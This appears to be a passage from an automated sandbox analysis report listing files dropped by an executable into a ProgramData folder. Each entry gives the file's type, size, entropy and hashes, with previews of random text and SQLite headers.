MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\ProgramData\AFIDGDBGCAAF\GCFCFC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2650332555763906
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkM7SAELyKOMq+8QTQKC+CVumj/:K0q+n0J79ELyKOMq+8Q7k/
MD5:	DAA0017B66155FF219DC89579A56A06B
SHA1:	53D9C443240B6FC69372C91F8B0F0A1271458186
SHA-256:	82B9F23B6E75621F20E4EB34D148F09C007235B29636CE9F4A405C598011CA29
SHA-512:	09654ECEF99BFA5892EF1D366F98188DBA6F845E4031EEF09679C9BBC0468DDEEC81859719E6D07E6CE0F6E8CF47C93F96BC99AF67FCD29A55D8AA381D49F471
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIDGDBGCAAF\GDGHID

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIDGDBGCAAF\GHIJJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702263764575455
Encrypted:	false
SSDEEP:	24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
MD5:	1680F18135FD9FE517865D4B70BCA69F
SHA1:	CE72CFB81AB690709C2C5BBF40348F829C87813B
SHA-256:	0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
SHA-512:	E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
Malicious:	false
Preview:	ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

C:\ProgramData\AFIDGDBGCAAF\GHJKEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\ProgramData\AFIDGDBGCAAF\HCFBAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\ProgramData\AFIDGDBGCAAF\HCGDGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\ProgramData\AFIDGDBGCAAF\HDBGHI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\ProgramData\AFIDGDBGCAAF\HDGCGH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\ProgramData\AFIDGDBGCAAF\HJDAKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\ProgramData\AFIDGDBGCAAF\HJJDGH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702263764575455
Encrypted:	false
SSDEEP:	24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
MD5:	1680F18135FD9FE517865D4B70BCA69F
SHA1:	CE72CFB81AB690709C2C5BBF40348F829C87813B
SHA-256:	0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
SHA-512:	E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
Malicious:	false
Preview:	ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

C:\ProgramData\AFIDGDBGCAAF\HJJJDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\ProgramData\AFIDGDBGCAAF\IECBAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
